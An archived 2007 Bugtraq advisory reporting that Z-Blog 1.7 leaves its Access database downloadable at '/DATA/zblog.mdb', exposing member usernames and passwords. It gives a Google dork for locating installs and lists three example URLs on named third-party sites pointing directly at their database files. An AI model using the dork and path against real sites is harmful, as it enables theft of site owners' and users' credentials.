lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070601111938.14216.qmail@securityfocus.com> Date: 1 Jun 2007 11:19:38 -0000 From: Raed@...Mail.Com To: bugtraq@...urityfocus.com Subject: Z-Blog 1.7 Authentication Bypass Database Download Vulnerability * Author : Hasadya Raed * Contact : RaeD@...Mail.Com ~>Israel Hacker * Greetz : Fairoz :) * Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability * Script : Z-Blog 1.7 * Impact : Remote * Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216" * Download : http://bbs.rainbowsoft.org/attachment.php?aid=92 --/ REPRODUCE \-- # Attackers Can Authentication Bypass In This Product By Add The Following Files: ('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member] The Users Names And Passwords Inside --/ Examples \-- http://www.uistudio.cn/blog/DATA/zblog.mdb http://www.kenyja.com/blog/DATA/zblog.mdb http://www.netpub.cn/nffish/DATA/zblog.mdb